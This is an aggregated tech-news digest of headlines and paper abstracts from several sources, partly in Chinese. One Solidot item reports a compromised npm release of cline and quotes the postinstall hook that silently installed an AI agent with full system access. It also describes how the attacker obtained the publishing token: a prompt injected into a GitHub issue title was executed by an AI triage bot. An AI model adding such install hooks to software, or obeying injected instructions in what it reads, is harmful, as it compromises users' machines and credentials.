OrangeBot.AI Digest — 2026-03-08
87 headlines across 8 sources, aggregated for this day.
Hacker News(15)
- Agent Safehouse – macOS-native sandboxing for local agents (agent-safehouse.dev)
- Ask HN: Please restrict new accounts from posting
- Show HN: I built a real-time OSINT dashboard pulling 15 live global feeds (github.com)
- LibreOffice Writer now supports Markdown (blog.documentfoundation.org)
- Claude struggles to cope with ChatGPT exodus (www.forbes.com)
- The changing goalposts of AGI and timelines (mlumiste.com)
- Living human brain cells play DOOM on a CL1 [video] (www.youtube.com)
- Oracle may slash up to 30k jobs to fund AI data-centers as US banks retreat (www.cio.com)
- FrameBook (fb.edoo.gg)
- LibreOffice: Request to the European Commission to adhere to its own guidances (blog.documentfoundation.org)
- Why can't you tune your guitar? (2019) (www.ethanhein.com)
- How Big Diaper absorbs billions of extra dollars from American parents (thehustle.co)
- Ask HN: How to be alone?
- I ported Linux to the PS5 and turned it into a Steam Machine (xcancel.com)
- Apple's 512GB Mac Studio vanishes, a quiet acknowledgment of the RAM shortage (arstechnica.com)
GitHub Trending(12)
Product Hunt(15)
- Pulldog
A Mac application to keep your code reviews organized!
- GetMimic
Generate viral social & chat mockups in seconds with AI.
- Vibe Marketplace by Greta
Sell what you ship, instantly
- Claude Marketplace
Helping companies easily get the AI tools they need
- Song Sweeper
Remove duplicate songs
- LTX Desktop
Local open-source LTX video editor optimized for GPUs
- TestSprite 2.1
Agentic testing for the AI-native team.
- Olmo Hybrid
7B open model mixing transformers and linear RNNs
- NotchPad
The secure notepad and clipboard manager for your Mac.
- Variant
Endless designs for your ideas, just scroll.
- Copperlane
Turn hours of loan processing into seconds
- Thinking Line
AI-powered doodle video and vector generator
- 21st Agents SDK
SDK to add an Claude Code AI agent to your app
- GetBeel
Let AI collect invoices and do reconciliation in automatic
- Codex Security
Our application security agent
Hugging Face(15)
- MOOSE-Star: Unlocking Tractable Training for Scientific Discovery by Breaking the Complexity Barrier
While large language models (LLMs) show promise in scientific discovery, existing research focuses on inference or feedback-driven training, leaving the direct modeling of the generative reasoning process, P(hypothesis|background) (P(h|b)), unexplored. We demonstrate that directly training P(h|b) is mathematically intractable due to the combinatorial complexity (O(N^k)) inherent in retrieving and composing inspirations from a vast knowledge base. To break this barrier, we introduce MOOSE-Star, a unified framework enabling tractable training and scalable inference. In the best case, MOOSE-Star reduces complexity from exponential to logarithmic (O(log N)) by (1) training on decomposed subtasks derived from the probabilistic equation of discovery, (2) employing motivation-guided hierarchical search to enable logarithmic retrieval and prune irrelevant subspaces, and (3) utilizing bounded composition for robustness against retrieval noise. To facilitate this, we release TOMATO-Star, a dataset of 108,717 decomposed papers (38,400 GPU hours) for training. Furthermore, we show that while brute-force sampling hits a ''complexity wall,'' MOOSE-Star exhibits continuous test-time scaling.
- SkillNet: Create, Evaluate, and Connect AI Skills
Current AI agents can flexibly invoke tools and execute complex tasks, yet their long-term advancement is hindered by the lack of systematic accumulation and transfer of skills. Without a unified mechanism for skill consolidation, agents frequently ``reinvent the wheel'', rediscovering solutions in isolated contexts without leveraging prior strategies. To overcome this limitation, we introduce SkillNet, an open infrastructure designed to create, evaluate, and organize AI skills at scale. SkillNet structures skills within a unified ontology that supports creating skills from heterogeneous sources, establishing rich relational connections, and performing multi-dimensional evaluation across Safety, Completeness, Executability, Maintainability, and Cost-awareness. Our infrastructure integrates a repository of over 200,000 skills, an interactive platform, and a versatile Python toolkit. Experimental evaluations on ALFWorld, WebShop, and ScienceWorld demonstrate that SkillNet significantly enhances agent performance, improving average rewards by 40% and reducing execution steps by 30% across multiple backbone models. By formalizing skills as evolving, composable assets, SkillNet provides a robust foundation for agents to move from transient experience to durable mastery.
- DARE: Aligning LLM Agents with the R Statistical Ecosystem via Distribution-Aware Retrieval
Large Language Model (LLM) agents can automate data-science workflows, but many rigorous statistical methods implemented in R remain underused because LLMs struggle with statistical knowledge and tool retrieval. Existing retrieval-augmented approaches focus on function-level semantics and ignore data distribution, producing suboptimal matches. We propose DARE (Distribution-Aware Retrieval Embedding), a lightweight, plug-and-play retrieval model that incorporates data distribution information into function representations for R package retrieval. Our main contributions are: (i) RPKB, a curated R Package Knowledge Base derived from 8,191 high-quality CRAN packages; (ii) DARE, an embedding model that fuses distributional features with function metadata to improve retrieval relevance; and (iii) RCodingAgent, an R-oriented LLM agent for reliable R code generation and a suite of statistical analysis tasks for systematically evaluating LLM agents in realistic analytical scenarios. Empirically, DARE achieves an NDCG at 10 of 93.47%, outperforming state-of-the-art open-source embedding models by up to 17% on package retrieval while using substantially fewer parameters. Integrating DARE into RCodingAgent yields significant gains on downstream analysis tasks. This work helps narrow the gap between LLM automation and the mature R statistical ecosystem.
- AgentVista: Evaluating Multimodal Agents in Ultra-Challenging Realistic Visual Scenarios
Real-world multimodal agents solve multi-step workflows grounded in visual evidence. For example, an agent can troubleshoot a device by linking a wiring photo to a schematic and validating the fix with online documentation, or plan a trip by interpreting a transit map and checking schedules under routing constraints. However, existing multimodal benchmarks mainly evaluate single-turn visual reasoning or specific tool skills, and they do not fully capture the realism, visual subtlety, and long-horizon tool use that practical agents require. We introduce AgentVista, a benchmark for generalist multimodal agents that spans 25 sub-domains across 7 categories, pairing realistic and detail-rich visual scenarios with natural hybrid tool use. Tasks require long-horizon tool interactions across modalities, including web search, image search, page navigation, and code-based operations for both image processing and general programming. Comprehensive evaluation of state-of-the-art models exposes significant gaps in their ability to carry out long-horizon multimodal tool use. Even the best model in our evaluation, Gemini-3-Pro with tools, achieves only 27.3% overall accuracy, and hard instances can require more than 25 tool-calling turns. We expect AgentVista to accelerate the development of more capable and reliable multimodal agents for realistic and ultra-challenging problem solving.
- RoboPocket: Improve Robot Policies Instantly with Your Phone
Scaling imitation learning is fundamentally constrained by the efficiency of data collection. While handheld interfaces have emerged as a scalable solution for in-the-wild data acquisition, they predominantly operate in an open-loop manner: operators blindly collect demonstrations without knowing the underlying policy's weaknesses, leading to inefficient coverage of critical state distributions. Conversely, interactive methods like DAgger effectively address covariate shift but rely on physical robot execution, which is costly and difficult to scale. To reconcile this trade-off, we introduce RoboPocket, a portable system that enables Robot-Free Instant Policy Iteration using single consumer smartphones. Its core innovation is a Remote Inference framework that visualizes the policy's predicted trajectory via Augmented Reality (AR) Visual Foresight. This immersive feedback allows collectors to proactively identify potential failures and focus data collection on the policy's weak regions without requiring a physical robot. Furthermore, we implement an asynchronous Online Finetuning pipeline that continuously updates the policy with incoming data, effectively closing the learning loop in minutes. Extensive experiments demonstrate that RoboPocket adheres to data scaling laws and doubles the data efficiency compared to offline scaling strategies, overcoming their long-standing efficiency bottleneck. Moreover, our instant iteration loop also boosts sample efficiency by up to 2times in distributed environments a small number of interactive corrections per person. Project page and videos: https://robo-pocket.github.io.
- HiFi-Inpaint: Towards High-Fidelity Reference-Based Inpainting for Generating Detail-Preserving Human-Product Images
Human-product images, which showcase the integration of humans and products, play a vital role in advertising, e-commerce, and digital marketing. The essential challenge of generating such images lies in ensuring the high-fidelity preservation of product details. Among existing paradigms, reference-based inpainting offers a targeted solution by leveraging product reference images to guide the inpainting process. However, limitations remain in three key aspects: the lack of diverse large-scale training data, the struggle of current models to focus on product detail preservation, and the inability of coarse supervision for achieving precise guidance. To address these issues, we propose HiFi-Inpaint, a novel high-fidelity reference-based inpainting framework tailored for generating human-product images. HiFi-Inpaint introduces Shared Enhancement Attention (SEA) to refine fine-grained product features and Detail-Aware Loss (DAL) to enforce precise pixel-level supervision using high-frequency maps. Additionally, we construct a new dataset, HP-Image-40K, with samples curated from self-synthesis data and processed with automatic filtering. Experimental results show that HiFi-Inpaint achieves state-of-the-art performance, delivering detail-preserving human-product images.
- Interactive Benchmarks
Standard benchmarks have become increasingly unreliable due to saturation, subjectivity, and poor generalization. We argue that evaluating model's ability to acquire information actively is important to assess model's intelligence. We propose Interactive Benchmarks, a unified evaluation paradigm that assesses model's reasoning ability in an interactive process under budget constraints. We instantiate this framework across two settings: Interactive Proofs, where models interact with a judge to deduce objective truths or answers in logic and mathematics; and Interactive Games, where models reason strategically to maximize long-horizon utilities. Our results show that interactive benchmarks provide a robust and faithful assessment of model intelligence, revealing that there is still substantial room to improve in interactive scenarios. Project page: https://github.com/interactivebench/interactivebench
- Large Multimodal Models as General In-Context Classifiers
Which multimodal model should we use for classification? Previous studies suggest that the answer lies in CLIP-like contrastive Vision-Language Models (VLMs), due to their remarkable performance in zero-shot classification. In contrast, Large Multimodal Models (LMM) are more suitable for complex tasks. In this work, we argue that this answer overlooks an important capability of LMMs: in-context learning. We benchmark state-of-the-art LMMs on diverse datasets for closed-world classification and find that, although their zero-shot performance is lower than CLIP's, LMMs with a few in-context examples can match or even surpass contrastive VLMs with cache-based adapters, their "in-context" equivalent. We extend this analysis to the open-world setting, where the generative nature of LMMs makes them more suitable for the task. In this challenging scenario, LMMs struggle whenever provided with imperfect context information. To address this issue, we propose CIRCLE, a simple training-free method that assigns pseudo-labels to in-context examples, iteratively refining them with the available context itself. Through extensive experiments, we show that CIRCLE establishes a robust baseline for open-world classification, surpassing VLM counterparts and highlighting the potential of LMMs to serve as unified classifiers, and a flexible alternative to specialized models.
- DreamWorld: Unified World Modeling in Video Generation
Despite impressive progress in video generation, existing models remain limited to surface-level plausibility, lacking a coherent and unified understanding of the world. Prior approaches typically incorporate only a single form of world-related knowledge or rely on rigid alignment strategies to introduce additional knowledge. However, aligning the single world knowledge is insufficient to constitute a world model that requires jointly modeling multiple heterogeneous dimensions (e.g., physical commonsense, 3D and temporal consistency). To address this limitation, we introduce DreamWorld, a unified framework that integrates complementary world knowledge into video generators via a Joint World Modeling Paradigm, jointly predicting video pixels and features from foundation models to capture temporal dynamics, spatial geometry, and semantic consistency. However, naively optimizing these heterogeneous objectives can lead to visual instability and temporal flickering. To mitigate this issue, we propose Consistent Constraint Annealing (CCA) to progressively regulate world-level constraints during training, and Multi-Source Inner-Guidance to enforce learned world priors at inference. Extensive evaluations show that DreamWorld improves world consistency, outperforming Wan2.1 by 2.26 points on VBench. Code will be made publicly available at https://github.com/ABU121111/DreamWorld{mypink{Github}}.
- SageBwd: A Trainable Low-bit Attention
Low-bit attention, such as SageAttention, has emerged as an effective approach for accelerating model inference, but its applicability to training remains poorly understood. In prior work, we introduced SageBwd, a trainable INT8 attention that quantizes six of seven attention matrix multiplications while preserving fine-tuning performance. However, SageBwd exhibited a persistent performance gap to full-precision attention (FPA) during pre-training. In this work, we investigate why this gap occurs and demonstrate that SageBwd matches full-precision attention during pretraining. Through experiments and theoretical analysis, we reach a few important insights and conclusions: (i) QK-norm is necessary for stable training at large tokens per step, (ii) quantization errors primarily arise from the backward-pass score gradient dS, (iii) reducing tokens per step enables SageBwd to match FPA performance in pre-training, and (iv) K-smoothing remains essential for training stability, while Q-smoothing provides limited benefit during pre-training.
- Timer-S1: A Billion-Scale Time Series Foundation Model with Serial Scaling
We introduce Timer-S1, a strong Mixture-of-Experts (MoE) time series foundation model with 8.3B total parameters, 0.75B activated parameters for each token, and a context length of 11.5K. To overcome the scalability bottleneck in existing pre-trained time series foundation models, we perform Serial Scaling in three dimensions: model architecture, dataset, and training pipeline. Timer-S1 integrates sparse TimeMoE blocks and generic TimeSTP blocks for Serial-Token Prediction (STP), a generic training objective that adheres to the serial nature of forecasting. The proposed paradigm introduces serial computations to improve long-term predictions while avoiding costly rolling-style inference and pronounced error accumulation in the standard next-token prediction. Pursuing a high-quality and unbiased training dataset, we curate TimeBench, a corpus with one trillion time points, and apply meticulous data augmentation to mitigate predictive bias. We further pioneer a post-training stage, including continued pre-training and long-context extension, to enhance short-term and long-context performance. Evaluated on the large-scale GIFT-Eval leaderboard, Timer-S1 achieves state-of-the-art forecasting performance, attaining the best MASE and CRPS scores as a pre-trained model. Timer-S1 will be released to facilitate further research.
- RealWonder: Real-Time Physical Action-Conditioned Video Generation
Current video generation models cannot simulate physical consequences of 3D actions like forces and robotic manipulations, as they lack structural understanding of how actions affect 3D scenes. We present RealWonder, the first real-time system for action-conditioned video generation from a single image. Our key insight is using physics simulation as an intermediate bridge: instead of directly encoding continuous actions, we translate them through physics simulation into visual representations (optical flow and RGB) that video models can process. RealWonder integrates three components: 3D reconstruction from single images, physics simulation, and a distilled video generator requiring only 4 diffusion steps. Our system achieves 13.2 FPS at 480x832 resolution, enabling interactive exploration of forces, robot actions, and camera controls on rigid objects, deformable bodies, fluids, and granular materials. We envision RealWonder opens new opportunities to apply video models in immersive experiences, AR/VR, and robot learning. Our code and model weights are publicly available in our project website: https://liuwei283.github.io/RealWonder/
- MASQuant: Modality-Aware Smoothing Quantization for Multimodal Large Language Models
Post-training quantization (PTQ) with computational invariance for Large Language Models~(LLMs) have demonstrated remarkable advances, however, their application to Multimodal Large Language Models~(MLLMs) presents substantial challenges. In this paper, we analyze SmoothQuant as a case study and identify two critical issues: Smoothing Misalignment and Cross-Modal Computational Invariance. To address these issues, we propose Modality-Aware Smoothing Quantization (MASQuant), a novel framework that introduces (1) Modality-Aware Smoothing (MAS), which learns separate, modality-specific smoothing factors to prevent Smoothing Misalignment, and (2) Cross-Modal Compensation (CMC), which addresses Cross-modal Computational Invariance by using SVD whitening to transform multi-modal activation differences into low-rank forms, enabling unified quantization across modalities. MASQuant demonstrates stable quantization performance across both dual-modal and tri-modal MLLMs. Experimental results show that MASQuant is competitive among the state-of-the-art PTQ algorithms. Source code: https://github.com/alibaba/EfficientAI.
- Locality-Attending Vision Transformer
Vision transformers have demonstrated remarkable success in classification by leveraging global self-attention to capture long-range dependencies. However, this same mechanism can obscure fine-grained spatial details crucial for tasks such as segmentation. In this work, we seek to enhance segmentation performance of vision transformers after standard image-level classification training. More specifically, we present a simple yet effective add-on that improves performance on segmentation tasks while retaining vision transformers' image-level recognition capabilities. In our approach, we modulate the self-attention with a learnable Gaussian kernel that biases the attention toward neighboring patches. We further refine the patch representations to learn better embeddings at patch positions. These modifications encourage tokens to focus on local surroundings and ensure meaningful representations at spatial positions, while still preserving the model's ability to incorporate global information. Experiments demonstrate the effectiveness of our modifications, evidenced by substantial segmentation gains on three benchmarks (e.g., over 6% and 4% on ADE20K for ViT Tiny and Base), without changing the training regime or sacrificing classification performance. The code is available at https://github.com/sinahmr/LocAtViT/.
- UltraDexGrasp: Learning Universal Dexterous Grasping for Bimanual Robots with Synthetic Data
Grasping is a fundamental capability for robots to interact with the physical world. Humans, equipped with two hands, autonomously select appropriate grasp strategies based on the shape, size, and weight of objects, enabling robust grasping and subsequent manipulation. In contrast, current robotic grasping remains limited, particularly in multi-strategy settings. Although substantial efforts have targeted parallel-gripper and single-hand grasping, dexterous grasping for bimanual robots remains underexplored, with data being a primary bottleneck. Achieving physically plausible and geometrically conforming grasps that can withstand external wrenches poses significant challenges. To address these issues, we introduce UltraDexGrasp, a framework for universal dexterous grasping with bimanual robots. The proposed data-generation pipeline integrates optimization-based grasp synthesis with planning-based demonstration generation, yielding high-quality and diverse trajectories across multiple grasp strategies. With this framework, we curate UltraDexGrasp-20M, a large-scale, multi-strategy grasp dataset comprising 20 million frames across 1,000 objects. Based on UltraDexGrasp-20M, we further develop a simple yet effective grasp policy that takes point clouds as input, aggregates scene features via unidirectional attention, and predicts control commands. Trained exclusively on synthetic data, the policy achieves robust zero-shot sim-to-real transfer and consistently succeeds on novel objects with varied shapes, sizes, and weights, attaining an average success rate of 81.2% in real-world universal dexterous grasping. To facilitate future research on grasping with bimanual robots, we open-source the data generation pipeline at https://github.com/InternRobotics/UltraDexGrasp.
Techmeme(15)
- Luma AI debuts Uni-1, an image model that combines image understanding and generation in a single architecture, topping Nano Banana 2 on logic-based benchmarks (Matthias Bastian/The Decoder)
Matthias Bastian / The Decoder : Luma AI debuts Uni-1, an image model that combines image understanding and generation in a single architecture, topping Nano Banana 2 on logic-based benchmarks — Ask about this article... Like Google's Nano Banana Pro and GPT Image 1.5, Uni-1 is built on an autoregressive transformer …
- How Circle, Stripe, Coinbase, and others are building stablecoin-based agentic payments infrastructure that makes microtransactions between AI agents economical (Emily Mason/Bloomberg)
Emily Mason / Bloomberg : How Circle, Stripe, Coinbase, and others are building stablecoin-based agentic payments infrastructure that makes microtransactions between AI agents economical — Circle Internet Group Inc. and Stripe Inc. are racing to build payments systems for a world that doesn't exist yet …
- The US and Israel are using AI to wage war on Iran with unprecedented speed and precision in attacks, even as the cost of ill-informed decisions remains high (Wall Street Journal)
Wall Street Journal : The US and Israel are using AI to wage war on Iran with unprecedented speed and precision in attacks, even as the cost of ill-informed decisions remains high — Intelligence, targeting and damage assessments are accelerating thanks to military versions of software now remaking business and daily life
- A look at countries that moved to ban social media for kids in recent months, including Australia, Denmark, France, Germany, Greece, Malaysia, Spain, Indonesia (Aisha Malik/TechCrunch)
Aisha Malik / TechCrunch : A look at countries that moved to ban social media for kids in recent months, including Australia, Denmark, France, Germany, Greece, Malaysia, Spain, Indonesia — Over the past few months, several countries have announced plans to restrict social media access for children and teens.
- ZyG, whose software coordinates AI agents across SEO, marketing, and more for DTC brands, raised a $58M seed co-led by Bessemer, Viola Ventures, and Lightspeed (Mike Wheatley/SiliconANGLE)
Mike Wheatley / SiliconANGLE : ZyG, whose software coordinates AI agents across SEO, marketing, and more for DTC brands, raised a $58M seed co-led by Bessemer, Viola Ventures, and Lightspeed — When it comes to product innovation, global brands have an enormous advantage over smaller companies thanks to their massive scale …
- Thoughts on MacBook Neo, as Apple also expands its superpremium tier via "Ultra" products; sources: Apple wants to use aluminum 3D-printing for Watch and iPhone (Mark Gurman/Bloomberg)
Mark Gurman / Bloomberg : Thoughts on MacBook Neo, as Apple also expands its superpremium tier via “Ultra” products; sources: Apple wants to use aluminum 3D-printing for Watch and iPhone — Apple has taken the wraps off its $599 MacBook Neo, entering new territory in a way that could shake up the computer market.
- A study finds LLMs from Anthropic, Google, OpenAI, and xAI can help with academic fraud, specifically helping non-researchers submit fabricated papers to arXiv (Elizabeth Gibney/Nature)
Elizabeth Gibney / Nature : A study finds LLMs from Anthropic, Google, OpenAI, and xAI can help with academic fraud, specifically helping non-researchers submit fabricated papers to arXiv — - Elizabeth Gibney — Search author on: — PubMed Google Scholar — All major large language models (LLMs) …
- A profile of Emil Michael, who made his name as an aggressive dealmaker for Uber, as he takes a leading role in the Pentagon's dispute with Anthropic (Rebecca Torrence/Bloomberg)
Rebecca Torrence / Bloomberg : A profile of Emil Michael, who made his name as an aggressive dealmaker for Uber, as he takes a leading role in the Pentagon's dispute with Anthropic — Emil Michael made his name in Silicon Valley a decade ago as an aggressive dealmaker for a startup — Uber Technologies Inc. …
- German quick grocery delivery startup Flink raised $100M led by Prosus, a source says at a $900M valuation; Flink was reportedly valued at $5B in May 2022 (Christina Kyriasoglou/Bloomberg)
Christina Kyriasoglou / Bloomberg : German quick grocery delivery startup Flink raised $100M led by Prosus, a source says at a $900M valuation; Flink was reportedly valued at $5B in May 2022 — Flink SE raised funds in a round that values the firm at $900 million, in a sign that the grocery delivery startup has stabilized …
- Samsung's consumer device chief TM Roh says it is "open to strategic co-operation" with more AI groups, having recently added Perplexity to its mobile OS (Michael Acton/Financial Times)
Michael Acton / Financial Times : Samsung's consumer device chief TM Roh says it is “open to strategic co-operation” with more AI groups, having recently added Perplexity to its mobile OS — Korean giant's device chief says its future Galaxy devices will host multiple models as users mix and match AI tools
- Guild.ai, which helps companies develop, deploy, and observe AI agents, raised a $14M seed and $30M Series A, both led by GV, and is now valued at $300M (Chris Metinko/Axios)
Chris Metinko / Axios : Guild.ai, which helps companies develop, deploy, and observe AI agents, raised a $14M seed and $30M Series A, both led by GV, and is now valued at $300M — Guild.ai, a startup helping companies develop AI agents, has raised $44 million in a seed and Series A and is now valued at $300 million …
- Documents show two DOGE employees used ChatGPT to identify National Endowment for the Humanities grants, worth over $100M, to be cut for being related to DEI (Jennifer Schuessler/New York Times)
Jennifer Schuessler / New York Times : Documents show two DOGE employees used ChatGPT to identify National Endowment for the Humanities grants, worth over $100M, to be cut for being related to DEI — Documents show how A.I. was used to cancel most previously approved grants by the National Endowment for the Humanities as the agency embraced President Trump's agenda.
- As cheap, powerful GPS jammers proliferate, a look at some alternatives to GPS, including using supersensitive, quantum-based magnetic sensors (Christopher Mims/Wall Street Journal)
Christopher Mims / Wall Street Journal : As cheap, powerful GPS jammers proliferate, a look at some alternatives to GPS, including using supersensitive, quantum-based magnetic sensors — The proliferation of cheap, powerful GPS jammers has airline operators, shipping firms and militaries alike scrambling for navigation alternatives
- Iran targeting commercial datacenters in the UAE and Bahrain signals a new frontier in asymmetric warfare and raises doubts over the Gulf as a global AI hub (Daniel Boffey/The Guardian)
Daniel Boffey / The Guardian : Iran targeting commercial datacenters in the UAE and Bahrain signals a new frontier in asymmetric warfare and raises doubts over the Gulf as a global AI hub — Iran's targeting of commercial datacentres in the UAE and Bahrain signals a new frontier in asymmetric warfare
- Leading the Future, a pro-AI PAC backed by Palantir-cofounder Joe Lonsdale, hit pro-regulation Democrat Alex Bores with attack ads over Bores' work for Palantir (Nancy Scola/Politico)
Nancy Scola / Politico : Leading the Future, a pro-AI PAC backed by Palantir-cofounder Joe Lonsdale, hit pro-regulation Democrat Alex Bores with attack ads over Bores' work for Palantir — NEW YORK CITY — Alex Bores had known for a while that a political operation called Leading the Future, funded …
Solidot(15)
- 印尼和印度卡纳塔克邦将禁止 16 岁以下儿童使用社媒
继澳大利亚之后,印度科技重镇卡纳塔克邦(Karnataka)与印度尼西亚相继宣布将禁止 16 岁以下青少年使用社交媒体及高风险数字平台。印尼通信与数码部长梅蒂雅(Meutya Hafid)星期五发声明说,政府将从 3 月 28 日起,分阶段注销 16 岁以下青少年在“高风险平台”上的账户。首批受影响的平台包括 YouTube、TikTok、Facebook、Instagram、Threads、X、Bigo Live 以及游戏平台 Roblox。梅蒂雅说,颁布禁令是因为青少年面临网络色情、网络欺凌、网络诈骗和网络成瘾的威胁。印度卡纳塔克邦立法议员星期五在邦预算会议上提出禁止16岁以下青少年使用社媒应用的法案。卡纳塔克邦将成为全印度首个实行这项禁令的邦。议员里兹万说:“青少年在未了解后果的情况下,就开始使用社交媒体。我们将与社会人士探讨,如何在社媒落实年龄限制。”
- NASA DART 探测器确认改变了小行星的轨道
NASA 执行双小行星重定向测试(DART)任务的探测器于 2022 年 9 月撞击了小行星 Dimorphos,这是世界首次行星防御技术演示。撞击不仅改变了 Dimorphos 绕较大伴星 Didymos 的运动,也同时使这对双小行星绕太阳的轨道出现可测量的改变。观测结果显示,原本约 770 天的公转周期缩短了 0.15 秒,这是人类制造的物体首次被量测到改变天体绕太阳运行的轨道。先前研究已发现,Dimorphos 绕直径约 805 米的 Didymos 公转周期(约 12 小时)因撞击缩短了 33 分钟。新的研究指出,撞击喷出的碎屑使整个系统的轨道速度改变约每秒 11.7 微米,导致其绕太阳的公转周期改变 0.15 秒。虽然这对轨道来说只是极其微小的变化,但随着时间累积,仍可能造成显著偏移,甚至影响一颗潜在危险小行星是否会撞上地球。
- 在卫星照片披露美国军事基地损失之后 Planet Labs 停止发布卫星照片
过去几天 Planet Labs 公司的卫星图像展示了美国在中东军事基地的战损情况,包括移动雷达 THAAD 遭到攻击的画面。Planet 周五宣布停止发布部分地区的卫星照片。Planet 运营着数百颗地球成像卫星,能每天对地球上的每一块陆地进行一次观测。其客户包括智库、非政府组织、学术机构、新闻媒体以及农业、林业和能源等行业的商业用户。它还与美国军方和情报机构签署了出售卫星照片的合同。Planet 宣布对特定地区的卫星照片强制推迟 96 小时发布。
- AI 翻译工具会将“幻觉”加入到维基百科文章
维基百科编辑实施了新政策,限制使用 AI 翻译工具将英文条目翻译到其它语言的贡献者,原因是他们发现 AI 工具会在译文中加入“幻觉”——即原文不存在的内容。问题与非营利组织 Open Knowledge Association (OKA)有关,该组织主要依赖来自“全球南方(Global South)”的廉价劳工充当翻译合同工,将英文维基百科文章翻译到其他语言。部分译者开始使用 Google Gemini 和 ChatGPT 等工具加快翻译,但编辑在审阅译文时发现了大量错误,包括事实错误、缺少引用以及引用不相关来源。
- 苹果禁止美国用户下载字节跳动的其它应用
拥有中国 App Store 账户的美国 iPhone 用户报告他们无法再下载或更新字节跳动的其它应用。用户会看到警告,“此应用在您所在的国家或地区不可用”。苹果是在遵守 2024 年美国国会通过的 TikTok 法案——《The Protecting Americans from Foreign Adversary Controlled Applications Act》,法案主要针对 TikTok,但也涵盖了字节跳动的其它应用如 TikTok 中国版抖音、AI 智能助手豆包以及阅读平台番茄小说。
- 小行星 2024 YR4 不会撞击月球
去年引发广泛关注的小行星 2024 YR4 一度成为近 20 年发现的最危险的小行星,它撞击地球的可能性已经排除,但有 4% 的概率会在 2032 年 12 月 22 日撞击月球。根据天文学家利用韦伯太空望远镜近红外相机 NIRCam 对其的最新观测,它也不会撞击月球了。2024 YR4 会安全从距离月球 2 万多公里处掠过。
- OpenWrt 25.12.0 释出
面向路由器等嵌入式设备的发行版 OpenWrt 释出了 v25.12.0。OpenWrt 25.12.0 以 2025 年 4 月 1 日去世的 Dave Täht 名字命名,他是 Bufferbloat 项目联合创始人,致力于降低网络延迟,他的工作让无数人的网速更快更稳定可靠。新版本的主要变化包括:包管理器从 opkg 切换到 apk,opkg 不再维护;attended.sysupgrade LuCI 大幅简化了升级流程;保留 Shell 历史;支持大量新设备,总数超过 2200 种,等等。
- 研究发现减少服用 GLP-1 的次数仍然能维持体重减轻
GLP-1 减肥药已经改变了无数肥胖者的生活,但停用减肥药的人通常会恢复大部分减轻的体重。GLP-1 减肥药价格不菲,如果需要终身服药那么这就给服用者带来了经济上的巨大负担。发表在《Obesity》的一项研究探讨了如何在减肥的同时减少减肥药支出的可能性。小规模实验发现,减少 GLP-1 减肥药的服用间隔仍然维持减肥效果。30 名服用减肥药的人参与了研究,23 人将服药间隔改为两周或至少 10 天,另外 7 人服药间隔更长。研究人员发现,几乎所有人减肥后的 BMI 指数都保持稳定,只有 5 人体重略有回升。有 4 人在体重再次增加后恢复到了原来的服药方案。研究人员表示需要扩大规模验证这项发现。
- 美国国会将国际空间站寿命延长到 2032 年,要求 NASA 转向商业空间站
最近修订的参议院授权法案(Senate authorization bill)将国际空间站的寿命从 2030 年延长到 2032 年,同时要求 NASA 转向商业空间站,加速用商业空间站取代国际空间站。法案要求在批准 60 天内 NASA 必须公开近地轨道商业空间站的需求;90 天内发布最终的征求建议书征求行业的回应;180 天内与两家或两家以上的商业供应商签订合同。Axiom Space、Blue Origin、Vast 和 Voyager 等私营公司正在敲定商业空间站的设计方案,它们都希望 NASA 提供更多需求信息,包括宇航员在空间站驻留时间、所需的科学设备类型等等。
- LGPL 授权代码用 AI 重写后改用 MIT 授权
重新授权开源项目的许可协议在开源领域是非常困难的,因为这通常需要所有曾贡献过一行代码的人一致同意,这对历史悠久的项目而言是几乎不可能完成的任务。Python 字符编码检测器项目 chardet 移植自用 C++ 开发的 Mozilla 项目,采用了与原项目相同的 LGPL 许可证,LGPL 许可对商业使用不是太友好。维护者最近在 Claude Code 的帮助下重写了库发布了 v7.0.0 版本,将许可协议从 LGPL 更改为 MIT。项目原作者 a2mark 认为此举构成了潜在的 GPL 违反,因为开发者已经接触过原代码,并非是净室实现,因此完全重写代码的说法是没有意义的。
- 大模型提示注入漏洞导致四千开发者机器被入侵
2026 年 2 月 17 日,有人在 npm 上发布了 cline@2.3.0,它与之前的版本基本上相同,唯一的区别是在 package.json 中加入了一行代码:"postinstall": "npm install -g openclaw@latest"。在之后的八小时内,所有安装或更新 Cline 的开发者都在未经许可的情况下,在计算机上全局安装了 OpenClaw——拥有完整系统访问权限的 AI 智能体。在该软件包被撤回之前,其下载量大约 4000 次。有意思的不是有效载荷,而是攻击者最初是如何获取到 npm 令牌的:将一个提示信息注入到 GitHub 问题标题中,AI 分类机器人读取了提示信息,将其解释为指令并执行。
- 微软确认开发代号为 Project Helix 的下一代 Xbox
微软新上任的游戏业务负责人 Asha Sharma 确认了该公司正在开发代号为 Project Helix 的下一代 Xbox 游戏机。关于新主机的有效信息很少,但看起来它可能类似 Valve 的 Linux 游戏机 Steam Machine,模糊了游戏机和 PC 的界限,能同时运行 Xbox 和 PC 游戏。为了维持向后兼容性,新主机可能会继续使用 AMD 的 SoC,结合 Xbox 硬件与 PC 架构。Project Helix 可能会标志着游戏机生态系统结构的重大转变,从封闭的硬件平台转向更接近于统一的 PC-主机环境。
- 日本首次批准 iPS 细胞再生医疗产品
日本厚生劳动省以附带条件和限期的方式批准制造和销售使用诱导多能干细胞(iPS 细胞)的再生医疗产品。此次获批的是用于重度心力衰竭的 ReHeart 和用于帕金森病的 Amchepry。此次批准在 iPS 细胞实际应用于再生医疗方面开创了全球先河。ReHeart 预计价格在 1000 万日元(约合人民币 44 万元)以上,Amchepry 价格也不菲。此次批准期限为 7 年,如果能通过治疗确认有效性,就将转为无条件批准。ReHeart 用于血管堵塞导致血液难以到达心脏的“缺血性心肌病”引发的重度心力衰竭。它的原理是将来自他人 iP S细胞的心肌细胞培育成薄膜状并贴在心脏表面,使之生成新的血管。该药由源于大阪大学的初创企业“Cuorips”(东京)研发。Amchepry 的对象是脑内释放神经传导物质多巴胺的神经细胞减少引发身体僵硬及手足颤抖的“帕金森病”。原理是将他人的iPS细胞培育成释放多巴胺的神经前体细胞,并移植到头部。这可能有助于根治。它由住友制药(大阪市)研发。
- 关注面向创业公司和投资机构的 GTC 2026
3月16 - 19日,NVIDIA初创加速计划将携手创业生态合作伙伴、优秀会员企业代表及创投联盟资深投资人在GTC 2026上带来全新会议特辑。会议包含3场针对中国创业者的精彩演讲。特辑内容将围绕中国创业生态格局、前沿技术趋势、2025年中国AI市场前景,以及重点行业投资方向等议题展开,全景呈现当前AI创业、前沿技术领域的热门话题。GTC现场还将设置Inception Startup Pavilion创业企业展区、投资人AI Day、创业公司和投资机构路演等环节。
- 十分之一的 Firefox 崩溃是比特翻转导致的
